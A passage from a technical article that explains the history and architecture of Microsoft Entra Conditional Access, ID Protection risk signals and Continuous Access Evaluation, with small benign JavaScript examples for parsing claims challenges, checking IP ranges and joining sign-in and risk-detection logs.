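```

The same user and app produce two different outcomes purely because the risk signal changed, which is the point of feeding ID Protection into the policy plane.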

Every component in this chain is individually documented on Microsoft Learn. The Conditional Access policy schema is on the Graph reference [@ms-graph-capolicy]. The riskDetection resource is on the Graph reference too [@ms-graph-riskdetection]. The cp1 client capability is in the claims-challenge document [@ms-claims-challenge]. The "up to 15 minutes" propagation ceiling for CAE non-IP events is in the CAE concept document [@ms-cae-concept].
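On the client side, the claims challenge amounts to parsing one response header. The sketch below assumes Node.js (it uses the global `Buffer` for base64) and a header laid out as quoted `key="value"` pairs. The function name `parseClaimsChallenge` is hypothetical, and the sample claims payload is constructed inside the example rather than captured from a real response.

```javascript
// Extract and decode the claims from a 401 + insufficient_claims challenge.
// Returns the decoded claims object, or null if this is not a claims challenge.
function parseClaimsChallenge(status, wwwAuthenticate) {
  if (status !== 401 || !wwwAuthenticate) return null;
  const params = {};
  // Collect key="value" pairs from the Bearer challenge.
  for (const m of wwwAuthenticate.matchAll(/(\w+)="([^"]*)"/g)) {
    params[m[1]] = m[2];
  }
  if (params.error !== 'insufficient_claims' || !params.claims) return null;
  const json = Buffer.from(params.claims, 'base64').toString('utf8');
  return JSON.parse(json);
}

// Build a sample header so the example is self-contained.
const sampleClaims = { access_token: { nbf: { essential: true, value: '1604106651' } } };
const encoded = Buffer.from(JSON.stringify(sampleClaims)).toString('base64');
const header = 'Bearer realm="", '
  + 'authorization_uri="https://login.microsoftonline.com/common/oauth2/authorize", '
  + `error="insufficient_claims", claims="${encoded}"`;

const challenge = parseClaimsChallenge(401, header);
const notAChallenge = parseClaimsChallenge(200, header);
console.log(challenge, notAChallenge);
```

A client that has declared the `cp1` capability would pass the decoded claims back to Entra on its next token request. In practice an authentication library usually handles that step, so hand-rolled parsing like this is mostly useful for reading traces.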

But the chain is not assembled anywhere. That is what this article does.

This article is for the architect or the detection engineer who already knows what a JWT is, what a service principal is, and what an MDM does. If you have ever stared at a Sign-in log entry that reads "Conditional Access: Success" and wondered what exactly the policy engine concluded, this is for you.

Three moments of insight are coming. First, why MFA without context fails not because MFA is weak but because the unit is wrong (Section 3). Second, why the architectural breakthrough was a separation and not a new algorithm (Section 5). Third, why the system has limits that no engineering will fix (Section 8).

How did the industry end up with a token-issuance and claims-challenge model? The answer begins in 1975, with a paper that did not mention identity once.

2. From perimeter to identity boundary

In September 1975, Jerome Saltzer and Michael Schroeder published an eight-principle paper on operating-system protection that nobody at MIT thought of as a paper about cloud identity [@saltzer-schroeder-1975]. Half a century later, two of those eight -- complete mediation and least privilege -- are the implicit theorems every Conditional Access policy evaluates against. Where did the industry go in between?

Saltzer and Schroeder: the unstated theorems

Complete mediation says "every access to every object must be checked for authority." Least privilege says "every program and every user of the system should operate using the least set of privileges necessary to complete the job." These are stated as design principles, not theorems. But they function as theorems for anyone building an access-control system: violate either of them and you have, by construction, a vulnerability. Conditional Access does not derive the principles. It re-states them as a JSON schema and a runtime evaluator.

Jericho Forum: the perimeter dissolves

In 2003, David Lacey of the Royal Mail and a loose affiliation of corporate CISOs began arguing, against the prevailing castle-and-moat consensus, that the corporate network perimeter could no longer be relied on as the trust boundary. The Jericho Forum formally launched under the Open Group umbrella in January 2004 [@wikipedia-jericho-forum]. They coined the term "de-perimeterisation" to describe what their member firms were already living: data and identity travelling outside the firewall faster than the firewall could be moved.

Microsoft's own retrospective puts the quote precisely: the Jericho Forum "promoted a new concept of security called de-perimeterisation that focused on how to protect enterprise data flowing in and out of your enterprise network boundary instead of striving to convince users and the business to keep it on the corporate network" [@simos-2020-jericho]. The first sentence of Microsoft Learn's CA overview today is a direct descendant: "modern security extends beyond an organization's network perimeter" [@ms-ca-overview].

Kindervag: the name

John Kindervag, then a principal analyst at Forrester Research, gave the model its marketable name in a September 2010 report titled "No More Chewy Centers: Introducing the Zero Trust Model of Information Security" [@kindervag-2010-zero-trust]. Three tenets: all resources are accessed securely regardless of location; access control is on strict need-to-know and strictly enforced; all traffic is inspected and logged.

The label stuck. Microsoft Learn now calls CA "Microsoft's Zero Trust policy engine" in its first sentence [@ms-ca-overview]. The lineage from Kindervag's 14-page Forrester report to that sentence is direct.

The original Kindervag PDF is gated behind Forrester's paywall. The widely cited copy on ndm.net redirects to an unrelated managed-IT-services company; the only reliably accessible mirror is the Wayback Machine snapshot. Treat the lineage as well documented and the URL as a curiosity of how academic ideas survive the open web.

BeyondCorp: the alternative

In December 2014, Rory Ward and Betsy Beyer published "BeyondCorp: A New Approach to Enterprise Security" in USENIX ;login: [@ward-beyer-2014-beyondcorp]. The paper described Google's internal Zero Trust deployment: every request authenticated and authorized by an access proxy, no implicit network trust, device inventory and user identity as the inputs to access decisions. A follow-up in 2016 documented the production rollout [@osborn-2016-beyondcorp].

This is the architectural fork Section 7 returns to. BeyondCorp puts the policy engine in the data path, as a reverse proxy that sees every HTTP request. CA puts the policy engine at token issuance and re-evaluates via claims challenges. Both work. They are not interchangeable.

NIST SP 800-207: the vocabulary

In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture [@nist-sp-800-207-2020]. It codified the U.S. federal reference architecture: a Policy Engine that decides, a Policy Administrator that effects the decision, and a Policy Enforcement Point that intercepts the access.

That trio is the vocabulary the Microsoft Learn CA documentation now uses. In the SP 800-207 mapping, Conditional Access is the Policy Engine and Policy Administrator; Exchange Online, SharePoint Online, Teams, and Microsoft Graph are the Policy Enforcement Points; Entra ID Protection is the trust algorithm that feeds the Policy Engine.

If you ever have to map Conditional Access to SP 800-207 for a compliance review, the cleanest correspondences are: PE = the CA evaluator inside Entra; PA = Entra's token issuer (because the decision is effected by issuing or refusing a token); PEP = the resource API (Exchange, SharePoint, Graph) that validates the token, plus, for CAE-aware resources, the same API enforcing claims-challenge revocation mid-session. ID Protection is the "trust algorithm" input to the PE.

The doctrine was settled by 2020. But Microsoft had already been trying to build a perimeter on identity for six years, starting in 2014 with a much smaller idea.

3. Per-user MFA and the limits of binary controls

In 2014, Microsoft's only cloud-era access control was a per-user toggle that said MFA: yes or MFA: no. The toggle worked. It was a real improvement over passwords alone. It also produced the most exploited security failure of the next decade: MFA fatigue [@weinert-2023-managed-policies].

How does a control improve security and create a new attack class at the same time?

The per-user MFA state machine

Per-user MFA lives on the user object as a tri-state: Disabled, Enabled, or Enforced. Microsoft Learn now says the quiet part out loud: "The best way to protect users with Microsoft Entra MFA is to create a Conditional Access policy" and "Don't enable or enforce per-user Microsoft Entra multifactor authentication if you use Conditional Access policies" [@ms-howto-mfa-userstates]. That guidance carries a generation of operational pain inside it. Mixing the two surfaces, in practice, produces unpredictable prompts: a CA policy says "no MFA required for this location," the per-user state says "always MFA," and the user gets prompted twice.

Note: Microsoft's explicit guidance is to pick one surface. If you have Entra ID P1 or higher, use Conditional Access. The per-user state should remain Disabled for those accounts. Mixed configurations produce both false-positive prompts and, occasionally, false-negative skips [@ms-howto-mfa-userstates].

Trusted IP rules: one-dimensional context

Office 365 added a second knob in the same era: "trusted IPs." Sign-ins from a configured public IP range would skip the MFA challenge [@ms-ca-network]. The idea was that "on the corporate network" meant "more trustworthy." This was reasonable in 2014. By 2017, it was already eroded by full-tunnel VPNs (every employee egresses through the corporate /16 from home), split-tunnel VPNs (some traffic does, some does not), and the realisation that "corporate network" had stopped being a useful synonym for "trusted." Trusted IP is one-dimensional context, and one dimension was not enough.
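To see how little a trusted-IP rule actually knows, here is a minimal sketch of the check. The range `198.51.100.0/24` is a documentation address block used as a stand-in, and `requiresMfa` is a hypothetical name, not a product API.

```javascript
// Convert a dotted-quad IPv4 address to an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  return ip.split('.').reduce((acc, octet) => ((acc << 8) | Number(octet)) >>> 0, 0);
}

// True when `ip` falls inside `cidr` (for example "198.51.100.0/24").
function inCidr(ip, cidr) {
  const [base, bitsText] = cidr.split('/');
  const bits = Number(bitsText);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}

// Stand-in for the tenant's configured trusted ranges.
const TRUSTED_RANGES = ['198.51.100.0/24'];

// The whole decision is one membership test on the source IP.
function requiresMfa(sourceIp) {
  return !TRUSTED_RANGES.some((range) => inCidr(sourceIp, range));
}

console.log(requiresMfa('198.51.100.77')); // office desk, or a full-tunnel VPN from home
console.log(requiresMfa('203.0.113.42'));  // anywhere else
```

The function cannot tell an employee at a desk from anyone else egressing through the same range, which is the sense in which the context is one-dimensional.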

Security Defaults: the Free-SKU descendant

Since 22 October 2019, every new Entra ID tenant has had Security Defaults turned on at creation [@ms-security-defaults]. Security Defaults is a tenant-wide on/off switch that requires MFA for all admin roles, requires MFA for users when they show risk, blocks legacy authentication, and forces MFA registration. Microsoft's number on the impact is striking: "more than 99.9% of those common identity-related attacks are stopped by using multifactor authentication and blocking legacy authentication" [@ms-security-defaults].

For Entra ID Free tenants in 2026, Security Defaults is still the only available baseline. There is no per-app policy, no per-risk gating, no Conditional Access. This is the licensing reality Section 10 returns to.

Active Directory Federation Services -- AD FS -- is the on-prem federation product that ran the access-control story before any of this. It is still operational in many tenants. It is no longer Microsoft's strategic identity provider; the Microsoft Learn AD FS overview now opens with the explicit guidance "Instead of upgrading to the latest version of AD FS, Microsoft highly recommends migrating to Microsoft Entra ID" [@ms-ad-fs-overview]. AD FS claim rules functioned as a kind of policy engine, but they evaluated only at federation time and they had no concept of risk.

The four failure modes of the binary toggle

The first-generation controls -- per-user MFA, trusted IPs, Security Defaults -- share four documented limits:

No expression of context. The toggle is either on or off. It cannot say "MFA from a new country but not from the office."
Trusted IP is thin context. A public IP range is one bit of information; modern attacks include matching network egress.
No per-app policy. The toggle applies to all apps the user accesses. You cannot say "MFA for the admin portal, not for Outlook."
No exclusion semantics for break-glass accounts. Emergency-access accounts need to be reachable when everything else has failed. The binary toggle either includes them or excludes them; it does not let you say "exclude these accounts but log every sign-in as a high-priority alert."

MFA fatigue: when a control becomes a credential

The canonical failure of the binary toggle is push-bombing. The attacker has the password. The system requires MFA. The user gets four "approve sign-in?" notifications during a morning meeting. One gets a thumbs-up by reflex. The system did exactly what it was configured to do.

The attack works because the control has no concept of whether this is a normal sign-in. The same flow runs whether the request originates from the user's office WiFi or an anonymizing proxy in another country. The MFA challenge carries no risk-weighted information; the user has no signal that this prompt is different from yesterday's prompt. Fatigue is the consequence. Microsoft's own Entra blog catalogued the attack pattern and the operational mitigations in the wake of the 2022 incident cluster [@ms-techcom-mfa-fatigue].

Focusing on password rules, rather than things that can really help -- like multi-factor authentication (MFA), or great threat detection -- is just a distraction. -- Alex Weinert, Microsoft Identity, July 2019 [@weinert-2019-password]

Weinert's 2019 piece is now infamous in the identity community for its title alone -- "Your Pa$$word doesn't matter." The argument was that a password's composition rules carry no information that helps the system tell a real user from an attacker; what does carry information is context. The system needed a place to put that context.

If MFA yes/no cannot express context, the next step is obvious: make context the input. The history of CA from 2015 forward is the history of giving context a home.

4. Generation by generation

The next eight years produced six generations of access control, each one closing a specific failure of the previous one. They look like product launches in a marketing chronology. They are something more interesting: a sequence of negative results, each followed by a positive engineering response.

timeline
    title Conditional Access timeline
    2014 : Gen 1 per-user MFA and trusted IPs
    2015 : CA enters public preview
    2016 : Gen 2 Conditional Access general availability
    2016 : ID Protection enters preview
    2018 : Gen 3 risk-based CA conditions broadly available
    2020 : CAE enters preview
    2022 : Gen 4 Continuous Access Evaluation general availability
    2023 : Gen 5 CA for workload identities
    2023 : Gen 6 Microsoft-managed policies and Authentication Strengths
    2026 : CA for AI agent identities

The 2026 milestone -- Conditional Access for AI agent identities -- is itself still emerging; Microsoft's current framing in the Conditional Access Optimization Agent announcement names it explicitly as a frontier rather than a finished generation [@ms-techcom-ca-optimization-agent]. Section 9.1 returns to the open problems.

Gen 1 (2014 to 2016): per-user MFA

Documented in Section 3. The control has no concept of context. The failure motivates Gen 2.

Gen 2 (September 2016 GA): Conditional Access with static rules

The September 27, 2016 CloudBlogs post announcing CA general availability described it as "Protect your data at the front door," a framing that Microsoft documentation still uses [@ms-techcom-ca-frontdoor-2016]. The policy schema (users + cloud apps + conditions to grants) was introduced in the 2015 preview [@ms-techcom-ca-preview-2015] and survived essentially unchanged into 2016 GA.

Gen 2 closed Gen 1's failure mode: context now had a home. A policy could match on network location, on the app being accessed, on the user's group membership, on the device platform. It could express "block country X" or "require MFA when not on the corporate network."
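As a sketch of what "context has a home" looks like, here is a policy object in the general shape of the Graph `conditionalAccessPolicy` resource that expresses "require MFA when not on the corporate network." The display name and the break-glass placeholder are hypothetical, and `locationConditionMatches` is an illustrative helper, not the engine's real matching logic.

```javascript
// A policy in the general shape of the Graph conditionalAccessPolicy resource.
// The excluded object ID is a placeholder for an emergency-access account.
const requireMfaOffNetwork = {
  displayName: 'Require MFA outside trusted locations',
  state: 'enabledForReportingButNotEnforced', // start in report-only mode
  conditions: {
    users: { includeUsers: ['All'], excludeUsers: ['<break-glass-account-object-id>'] },
    applications: { includeApplications: ['All'] },
    locations: { includeLocations: ['All'], excludeLocations: ['AllTrusted'] },
  },
  grantControls: { operator: 'OR', builtInControls: ['mfa'] },
};

// Illustrative helper: does the location condition put this sign-in in scope?
// `signin.locationIsTrusted` is an assumed, pre-computed flag.
function locationConditionMatches(policy, signin) {
  const { includeLocations, excludeLocations } = policy.conditions.locations;
  const included =
    includeLocations.includes('All') ||
    (signin.locationIsTrusted && includeLocations.includes('AllTrusted'));
  const excluded = signin.locationIsTrusted && excludeLocations.includes('AllTrusted');
  return included && !excluded;
}

console.log(locationConditionMatches(requireMfaOffNetwork, { locationIsTrusted: false }));
console.log(locationConditionMatches(requireMfaOffNetwork, { locationIsTrusted: true }));
```

The same object also carries a user exclusion, which is how a policy can leave emergency-access accounts out of scope without switching the control off for everyone.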

The remaining documented limit: no risk feed. The engine could express what to check for but not whether this specific sign-in looks suspicious. A policy could block credential-stuffing attempts only if you happened to know in advance which IPs to deny. Motivated Gen 3.

Gen 3 (2017 to 2018): risk-based fusion

Identity Protection had been generating risk signals since its March 2016 preview. Through 2017 and 2018, two new condition keys appeared in the CA policy schema: signInRiskLevels and userRiskLevels. Both take values from the set low, medium, high. The risk feed plugged into the policy plane through exactly two keys. The legacy ID-Protection-side risk policies (which were a parallel policy surface inside ID Protection itself) are now retiring on 1 October 2026; the canonical surface is CA [@ms-id-protection-policies].

The remaining limit: pre-issuance only. The CA evaluator runs at sign-in time. Once a token is issued, the policy plane has no way to undo the decision until the token expires. Microsoft's own retrospective is honest about what they tried first: "Microsoft experimented with the 'blunt object' approach of reduced token lifetimes but found they degrade user experiences and reliability without eliminating risks" [@ms-cae-concept]. A one-hour token cuts the worst-case revocation latency to an hour, but it also means a user with intermittent connectivity gets prompted every hour, and a mobile app with retry storms can hammer the IdP. The trade-off was unacceptable. Motivated Gen 4.
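The trade-off is easy to put in numbers. The sketch below is plain arithmetic under one simplifying assumption: a client refreshes exactly once per token lifetime. The 10-minute lifetime is a hypothetical value chosen to show the trend, not a Microsoft setting.

```javascript
// With no revocation channel, a token stays usable until it expires, so the
// worst-case revocation latency equals the token lifetime.
function tokenTradeoff(lifetimeMinutes) {
  return {
    worstCaseRevocationMinutes: lifetimeMinutes,
    refreshesPerDay: (24 * 60) / lifetimeMinutes, // assumes one refresh per lifetime
  };
}

const oneHour = tokenTradeoff(60);
const tenMinutes = tokenTradeoff(10);

console.log(oneHour);
console.log(tenMinutes);
```

Shrinking the lifetime sixfold cuts the revocation window sixfold and multiplies the refresh traffic by the same factor, which is the "blunt object" problem in miniature.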

Gen 4 (January 2022 GA): Continuous Access Evaluation

CAE inverted the trade-off. Instead of shortening the token's lifetime, lengthen it -- up to 28 hours [@ms-cae-concept]. Then add a side channel: when a critical event fires (account disabled, password reset, high user risk, IP location change), the resource API issues an HTTP 401 with a WWW-Authenticate claims challenge, and the client replays the challenge to Entra to obtain a fresh token. Latency on the side channel is bounded: "up to 15 minutes" for non-IP events, "instant" for IP locations [@ms-cae-concept]. CAE was tied to an emerging open standard from day one, the OpenID Continuous Access Evaluation Profile [@ms-cae-concept]. The general-availability announcement landed on 10 January 2022 [@ms-techcom-cae-ga-2022].

Remaining limit: applies to humans only. Service principals do not consume CAE-aware client libraries; they cannot perform a claims challenge. Motivated Gen 5.

Gen 5 (2023 GA): Conditional Access for workload identities

Same engine, constrained grant set. The Microsoft Learn page is blunt on the boundaries: "Workload Identities Premium licenses are required" and the constraint set is unusual -- "Policy can be applied to single tenant service principals that are registered in your tenant. Microsoft and third-party SaaS applications, including multitenant apps, are not covered by these policies. Managed identities aren't covered by policy" and "Under Grant, Block access is the only available option" [@ms-workload-identity-ca]. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product followed in late November 2022, and the Conditional Access feature for workload identities itself reached general availability later in 2023.

The single-tenant restriction is a structural choice. Multi-tenant SaaS apps appear in many tenants' service principal directories at once; policy scoping on them would require a cross-tenant resolution protocol the engine does not have. Managed identities are excluded because they belong to Azure subscriptions, not to user identity, and Microsoft has chosen not to extend the surface there. Group assignments do not work either: "Conditional Access policies assigned to a group that contains a service principal are not enforced for that service principal" [@ms-workload-identity-ca].

Remaining limit: under-configured in most tenants because the grant taxonomy is so narrow that admins do not see immediate value. Motivated Gen 6.

Gen 6 (November 2023 onwards): Microsoft-managed policies and Authentication Strengths

In November 2023, Alex Weinert announced Microsoft-managed Conditional Access policies: a set of baselines that Microsoft would auto-deploy into tenants in Report-only mode and then auto-enable after a waiting period [@weinert-2023-managed-policies]. The launch announcement specified a 90-day window [@helpnet-2023-microsoft-entra-policies]. The current Microsoft Learn documentation specifies "Microsoft enables these policies no less than 45 days after they're introduced in your tenant if they're left in the Report-only state" with a 28-day pre-enablement notification [@ms-managed-policies].

The window shrank deliberately. The 90-day window in the 2023 launch announcement was a calibration window; the 45-day window in current documentation is the post-calibration setting. Both numbers are correct in their respective time frames. The article uses the current number throughout.
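For planning purposes, the current window can be turned into dates. This sketch assumes the 45 days count from the day the policy appears in the tenant and that the 28-day notice is measured back from the earliest enablement date; both readings are assumptions about the documentation, and `managedPolicyDates` is a hypothetical helper.

```javascript
const DAY_MS = 24 * 60 * 60 * 1000;

// Format a Date as YYYY-MM-DD in UTC.
const toIsoDate = (d) => d.toISOString().slice(0, 10);

// Given the date a Microsoft-managed policy was introduced in Report-only
// mode, estimate the earliest auto-enable date and the latest notice date.
function managedPolicyDates(introducedIsoDate) {
  const introduced = new Date(introducedIsoDate + 'T00:00:00Z');
  const earliestEnable = new Date(introduced.getTime() + 45 * DAY_MS);
  const latestNotice = new Date(earliestEnable.getTime() - 28 * DAY_MS);
  return {
    earliestEnable: toIsoDate(earliestEnable),
    latestNotice: toIsoDate(latestNotice),
  };
}

const planning = managedPolicyDates('2026-01-01');
console.log(planning);
```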

Parallel to the managed policies, Microsoft shipped Authentication Strengths -- a named bundle of acceptable authentication methods that can be required as a grant. The three built-in strengths are MFA strength, Passwordless MFA strength, and Phishing-resistant MFA strength (FIDO2 security key, Windows Hello for Business, multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the modern way to express "no adversary-in-the-middle phishing kit should be able to defeat this grant."

The pattern: extension, not replacement

From Gen 3 onward, each generation extends the prior schema rather than replacing it. The conditionalAccessPolicy JSON shape that shipped in 2016 still drives the engine in 2026 -- with new condition keys added, new grant types added, new session controls added. By the standards of cloud control surfaces, that is a long run without a rewrite.

The reason is the architectural decision the next section is about.

5. The two-plane separation

The breakthrough is not a model, not a token format, not a wire protocol. It is a separation: the signal plane that produces risk detections from the policy plane that consumes them.

Stated like that, it sounds banal. Read it the other direction -- a policy engine whose risk model can change without changing the policy semantics, and whose policy can change without retraining the model -- and it is the design that makes the system maintainable at trillions of daily signals across hundreds of thousands of tenants.

The two planes, precisely

The signal plane is Microsoft Entra ID Protection. It runs detection logic on every interactive sign-in (and, for offline detections, on historical sign-ins) and emits a riskDetection resource into a per-tenant log on Microsoft Graph at /identityProtection/riskDetections. Each detection carries five fields you care about: riskEventType (one of about two dozen named detection types like anonymizedIPAddress, leakedCredentials, unlikelyTravel), riskLevel (low, medium, high, plus the bookkeeping values hidden and none), riskState (atRisk, confirmedCompromised, dismissed, remediated), detectionTimingType (realtime, nearRealtime, offline), and additionalInfo (a JSON blob with user-agent, IP, alert URL, reason codes) [@ms-graph-riskdetection][@ms-id-protection-risks].
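A short sketch of reading that log: the helper below builds a Graph request URL filtered on `riskLevel` and trims a detection record down to the five fields named above. Acquiring a bearer token and sending the request are left out, the helper names are hypothetical, and the sample record is invented for illustration.

```javascript
const RISK_DETECTIONS_ENDPOINT =
  'https://graph.microsoft.com/v1.0/identityProtection/riskDetections';

// Build a request URL for detections at a given risk level.
function riskDetectionsUrl(riskLevel) {
  const url = new URL(RISK_DETECTIONS_ENDPOINT);
  url.searchParams.set('$filter', "riskLevel eq '" + riskLevel + "'");
  return url.toString();
}

// Keep only the five fields discussed in the text.
function summarizeDetection(d) {
  const { riskEventType, riskLevel, riskState, detectionTimingType, additionalInfo } = d;
  return { riskEventType, riskLevel, riskState, detectionTimingType, additionalInfo };
}

// Invented sample record, shaped like one element of the response's value array.
const sampleDetection = {
  id: 'example-id',
  riskEventType: 'anonymizedIPAddress',
  riskLevel: 'medium',
  riskState: 'atRisk',
  detectionTimingType: 'realtime',
  additionalInfo: '[]',
  ipAddress: '203.0.113.42',
};

const highRiskUrl = riskDetectionsUrl('high');
const summary = summarizeDetection(sampleDetection);
console.log(highRiskUrl);
console.log(summary);
```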

The policy plane is Conditional Access. Each policy is a JSON object at /identity/conditionalAccess/policies/{id} on the Graph API [@ms-graph-capolicy], with displayName, state (enabled, disabled, enabledForReportingButNotEnforced), conditions, grantControls, and sessionControls. The conditions block contains the per-policy targeting: which users, which apps, which platforms, which network locations -- and two condition keys named signInRiskLevels and userRiskLevels.

**Sign-in risk** is a per-sign-in probability that the credential being used is being used by someone other than the legitimate owner *at this moment*. **User risk** is a per-user probability that the account itself has been compromised over its recent history. A user with leaked credentials in a breach corpus carries persistent user risk until the password is reset; a user signing in from an anonymizing proxy carries sign-in risk for that session. CA policies can match on either, both, or neither. Risk-based conditions require Entra ID P2 [@ms-id-protection-policies].

Those two condition keys -- signInRiskLevels and userRiskLevels -- are the entire API surface between the signal plane and the policy plane. Everything else about ID Protection is hidden behind them. The policy plane does not know whether high came from a transformer or a logistic regression or a hardcoded rule. The signal plane does not know which policies will read its output. The contract is two strings.
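The narrowness of that contract shows up in code. In this minimal sketch the policy side sees only a level string per key; an empty or missing array is treated as "condition not configured," which is an assumption about the semantics chosen for illustration, and `riskConditionsMatch` is a hypothetical name.

```javascript
// True when the sign-in satisfies both risk condition keys of a policy.
// An empty or absent array means the policy does not condition on that key.
function riskConditionsMatch(conditions, signin) {
  const keyMatches = (levels, actual) =>
    !levels || levels.length === 0 || levels.includes(actual);
  return (
    keyMatches(conditions.signInRiskLevels, signin.signInRisk) &&
    keyMatches(conditions.userRiskLevels, signin.userRisk)
  );
}

const riskyOnly = { signInRiskLevels: ['medium', 'high'], userRiskLevels: [] };
const noRiskKeys = { signInRiskLevels: [], userRiskLevels: [] };

console.log(riskConditionsMatch(riskyOnly, { signInRisk: 'high', userRisk: 'none' }));
console.log(riskConditionsMatch(riskyOnly, { signInRisk: 'low', userRisk: 'none' }));
console.log(riskConditionsMatch(noRiskKeys, { signInRisk: 'low', userRisk: 'none' }));
```

Nothing in the function knows which detector produced the level, so the signal plane can change underneath it without the policy side noticing.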

flowchart LR
    subgraph SP[Signal plane Entra ID Protection]
        DET[Detection pipeline]
        RD[(riskDetection log)]
        RL[Risk level low medium high]
    end
    subgraph PP[Policy plane Conditional Access]
        EV[Policy evaluator]
        POL[(conditionalAccessPolicy JSON)]
        TOK[Token issuer]
    end
    subgraph SES[Session plane CAE]
        CH[Critical event channel]
        RP[Resource API]
    end
    DET --> RD
    DET --> RL
    RL -. signInRiskLevels userRiskLevels .-> EV
    POL --> EV
    EV --> TOK
    TOK -- access token --> RP
    DET -. user risk events .-> CH
    CH -. 401 insufficient claims .-> RP

Why the separation matters

Three concrete consequences fall out of the design:

The risk model is re-trainable without policy rewrites. Microsoft's ID Protection team can change the underlying detection algorithm tomorrow. Add a new riskEventType. Replace the classifier for unlikelyTravel. Re-tune the threshold that maps a score to low/medium/high. None of these require tenants to rewrite their CA policies, because policies match on the level, not the signal.

Tenants without the licence simply do not use the risk conditions. An Entra ID P1 tenant can deploy CA policies that match on users, apps, locations, devices, client apps, and platforms. P2 unlocks the risk conditions. The schema accommodates both: P1 policies just leave the risk arrays empty. There is no parallel policy surface for the non-risk-aware tenants; they use the same engine.

CAE is a third plane layered onto the same skeleton. Continuous Access Evaluation did not require redesign of the policy plane. The CAE channel is a new event delivery mechanism; the events it propagates are things the signal plane already knew about (high user risk, password reset, account disabled) plus new ones the policy plane introduced (network-location-policy changed). The architecture absorbed CAE because the design was already a separation of concerns.

Key idea: The signal plane and the policy plane are separable; the contract between them is two condition keys (signInRiskLevels and userRiskLevels). That is what makes the system maintainable across a decade of evolution.

The "pit of success" framing

Alex Weinert calls this the "pit of success." His November 2023 piece on Microsoft-managed policies put the metric on it: a decade ago Microsoft turned on a "radical" tenant-wide policy requiring MFA for every consumer Microsoft account, and "today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication" [@weinert-2023-managed-policies].

The 100 percent number is achievable because the policy plane and the signal plane can each evolve independently. Microsoft can ship a managed policy that says "require MFA for high-risk sign-ins" without committing to a fixed definition of "high risk." The definition lives on the signal plane and changes weekly. The policy lives on the policy plane and is stable for years.

With the separation as the spine, the next section walks the end-to-end pipeline in one continuous trace, from signal to grant to token to session, on a real sign-in -- the trace no public Microsoft document assembles in one place.

6. The end-to-end pipeline

Take Alice's Tuesday morning from Section 1 and walk it forward. This section has six subsections. By the end of them, the question "who decided?" has six independently sourced answers and one combined picture.

6.1 What the signal plane sees

Identity Protection's detection taxonomy splits into five rough groups, based on what kind of information triggered the detection. The canonical taxonomy is the Microsoft Learn page on risk types [@ms-id-protection-risks]; the wire-format enum on the Graph schema is at [@ms-graph-riskdetection].

Network signals. anonymizedIPAddress, maliciousIPAddress, nationStateIP, riskyIPAddress. The signal is the source IP and reputation databases that ID Protection ingests.
Behavioural signals. unlikelyTravel, mcasImpossibleTravel, newCountry, unfamiliarFeatures, anomalousUserActivity. The signal is a deviation from the tenant's or the user's historical baseline.
Credential signals. leakedCredentials, passwordSpray. The signal is a match against a corpus of breached credentials or a velocity-based pattern across tenants.
Token and session signals. anomalousToken, tokenIssuerAnomaly, attemptedPrtAccess, attackerinTheMiddle, authenticatorPhishing. The signal is on the token itself or on the way the authenticator flow ran.
Inbox behaviour. suspiciousInboxForwarding, mcasSuspiciousInboxManipulationRules. The signal is on what happened after the sign-in -- a post-compromise indicator that retroactively flags the sign-in that enabled it.

Each detection is also tagged with a timing: real-time, near-real-time, or offline. Microsoft Learn is precise about the latencies: "Detections triggered in real-time take 5-10 minutes to surface details in the reports. Offline detections take up to 48 hours" [@ms-risk-detection-types].

The detection is mapped to a risk level, not a probability. Microsoft Learn calls the level "calculated by our machine learning algorithms" and explicitly notes the meaning: low/medium/high "represent how confident Microsoft is that one or more of the user's credentials are known by an unauthorized entity" [@ms-risk-detection-types]. "Confidence" here is meant in the everyday sense, not the strict statistical sense of a confidence interval. Microsoft has not published a calibration study that would let you map a "high" risk level to a frequentist probability of compromise.

The figure you sometimes see in Microsoft marketing materials -- "more than 100 trillion signals processed per day" [@ms-managed-policies], or, in older sources, "78 trillion" [@ms-id-protection-overview] -- is the aggregate signal volume across all tenants and product surfaces, not per-sign-in features per user. The article keeps the two carefully separate.

Microsoft has not publicly disclosed the production model architecture, the feature vector size, or per-detection precision and recall. The 2021 Microsoft Security Blog interview with Maria Puertas Calvo describes the existence of the ML team and the operational scale ("hundreds of terabytes every day") but stops well short of architecture details [@ms-puertas-calvo-interview]. The model class is publicly unspecified; the taxonomy and the operating output are both public.

6.2 How risk surfaces

Two parallel logs matter for risk. The Sign-in log is the universe: every interactive and non-interactive sign-in produces an entry. The riskDetections log is the sparse overlay: a riskDetection is emitted only when a detection fires for the sign-in. Most sign-ins produce a Sign-in log entry with no corresponding riskDetection. Only flagged sign-ins do [@ms-graph-riskdetection].

This is a common source of confusion. It is tempting to assume "ID Protection scored every sign-in," and in a sense it did -- the detectors ran -- but the durable artefact exists only when at least one detector fired. To compute a per-sign-in distribution of risk you need to join the Sign-in log with the riskDetections log and treat the unjoined rows as "no risk flagged at the moment of issuance."
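That join can be sketched in a few lines. The example assumes the sign-in's `id` corresponds to the detection's `requestId`; treat that key choice as an assumption to verify against your own data. The records are invented for illustration.

```javascript
// Invented sample data: three sign-ins, two detections on the second one.
const signIns = [
  { id: 'req-1', userPrincipalName: 'alice@contoso.com' },
  { id: 'req-2', userPrincipalName: 'alice@contoso.com' },
  { id: 'req-3', userPrincipalName: 'bob@contoso.com' },
];
const riskDetections = [
  { requestId: 'req-2', riskEventType: 'anonymizedIPAddress', riskLevel: 'medium' },
  { requestId: 'req-2', riskEventType: 'unfamiliarFeatures', riskLevel: 'low' },
];

// Left join: every sign-in appears once; unjoined rows mean "no risk flagged".
function joinRisk(signInRows, detectionRows) {
  const byRequest = new Map();
  for (const d of detectionRows) {
    const list = byRequest.get(d.requestId) || [];
    list.push(d);
    byRequest.set(d.requestId, list);
  }
  return signInRows.map((s) => {
    const hits = byRequest.get(s.id) || [];
    return { id: s.id, flagged: hits.length > 0, detections: hits.map((d) => d.riskEventType) };
  });
}

const joined = joinRisk(signIns, riskDetections);
console.log(joined);
```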

